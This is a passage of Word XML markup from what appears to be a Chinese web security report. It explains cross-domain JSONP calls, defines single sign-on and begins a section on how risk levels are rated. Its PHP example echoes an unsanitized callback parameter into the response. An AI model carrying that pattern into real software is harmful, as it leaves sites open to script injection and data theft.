          <w:p w14:paraId="195212E4"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getUsers.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CAB665A"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callback = $_GET['callback'];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56828D5F" w14:textId="7D6E4DBB"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hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>print $callback.'({"id" : "1","name" : "</w:t>
            </w:r>
            <w:r w:rsidR="00E33678" w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>"});';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697646F5"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lastRenderedPageBreak/>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798D0FD9"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hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>然后在</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> a.com </w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;script&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>进行远程调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Jquery </w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>里可以直接这样调用：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A5F8C9" w14:textId="6D24B588"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script type="text/javascript" src="http://</w:t>
            </w:r>
            <w:r w:rsidR="00E33678" w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>www.xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00132143">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
                <w:snapToGrid/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>.com/framework/jquery/1.9.1/jquery-1.9.1.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014601BA"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script type="text/javascript"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75BCF3B7"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 xml:space="preserve">    $.getJSON("http://www.b.com/getUsers.php?callback=?", function(getUsers){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDEA7B1"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 xml:space="preserve">          alert(getUsers.name);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D4328E"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 xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE4F329" w14:textId="7517527F"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script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BCE3228" w14:textId="77777777" w:rsidR="007A60DA" w:rsidRPr="00132143" w:rsidRDefault="007A60DA" w:rsidP="00132143">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:snapToGrid/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B51186A" w14:textId="6AA894BA" w:rsidR="007A51BD" w:rsidRPr="006B4912" w:rsidRDefault="007A60DA" w:rsidP="006B4912">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:snapToGrid/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>英文全称</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Single Sign On</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单点登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D60710" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一种</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和授</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>机制，指</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同一服</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>务</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>器不同</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用中的受保</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>护资</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>源的同一用</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，只需要登</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一次，即通</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用中的安全</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后，再</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用中的受保</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>护资</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，不再需要重新登</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>录验证</w:t>
      </w:r>
      <w:r w:rsidR="00074A4B" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DEAEEA" w14:textId="4FBB4E03" w:rsidR="004B6EEB" w:rsidRPr="00112A2E" w:rsidRDefault="004B6EEB" w:rsidP="004B6EEB">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc498434576"/>
      <w:r w:rsidRPr="00112A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级依据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="6D9EEC5D" w14:textId="65FBDD68" w:rsidR="004B6EEB" w:rsidRPr="00C5683D" w:rsidRDefault="005D7526" w:rsidP="00C5683D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5683D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考《风险评估量化方法论》</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37EF23" w14:textId="77777777" w:rsidR="00B31E3F" w:rsidRPr="00F757E4" w:rsidRDefault="00B31E3F" w:rsidP="00106665">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B31E3F" w:rsidRPr="00F757E4" w:rsidSect="00B6145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简">
    <w:altName w:val="Arial Unicode MS"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="080F0000" w:usb2="00000010" w:usb3="00000000" w:csb0="0004009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Menlo">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E60022FF" w:usb1="D200F9FB" w:usb2="02000028"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41C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="051ED0F6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>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6"/>
      <w:numFmt w:val="none"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="2.2.1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1">
    <w:nsid w:val="013876BC"/>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B92D3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A56EED1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59600FA"/>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64E11D5"/>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6CF5E92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56D45A66"/>
    <w:lvl w:ilvl="0" w:tplc="87E00C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71269B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EBE7914"/>
    <w:lvl w:ilvl="0" w:tplc="02606C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72D0853"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35D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671881"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64CC7F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7D35EDA"/>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7DF26EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5AE21A6"/>
    <w:lvl w:ilvl="0" w:tplc="365AA3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8246CD7"/>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AE22A6"/>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A0F0332"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F08F1CC"/>
    <w:lvl w:ilvl="0" w:tplc="AE58D5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0AF87955"/>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B0028C0"/>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B5020DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F74B772"/>
    <w:lvl w:ilvl="0" w:tplc="8438F312">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="75A83DC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EC14409"/>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1B631FD"/>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0866B3"/>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644A22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CF46F7A"/>
    <w:lvl w:ilvl="0" w:tplc="ACDE75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14C32A58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D068AF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17986A69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4F456EC"/>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89B207D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA8C715E"/>
    <w:lvl w:ilvl="0" w:tplc="EEBC60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18CF6951"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25D26A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19132743"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3732C1DC"/>
    <w:lvl w:ilvl="0" w:tplc="092092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1A2400F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FBA3F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1AD92182"/>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1BB055DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FC83F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1BB951E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="958222FE"/>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1BCC228D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BD6053E"/>
    <w:lvl w:ilvl="0" w:tplc="04090011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="48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1DEE75D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02C81FDA"/>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1E0423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1F6D522C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC342B42"/>
    <w:lvl w:ilvl="0" w:tplc="91CE0C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209815E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9190D9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21932CBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B84A9676"/>
    <w:lvl w:ilvl="0" w:tplc="04090011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="48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35E1496"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAE2646C"/>
    <w:lvl w:ilvl="0" w:tplc="0C0EB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23A7034C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EFC2EE6"/>
    <w:lvl w:ilvl="0" w:tplc="1480EB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23BD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4E23CF6"/>
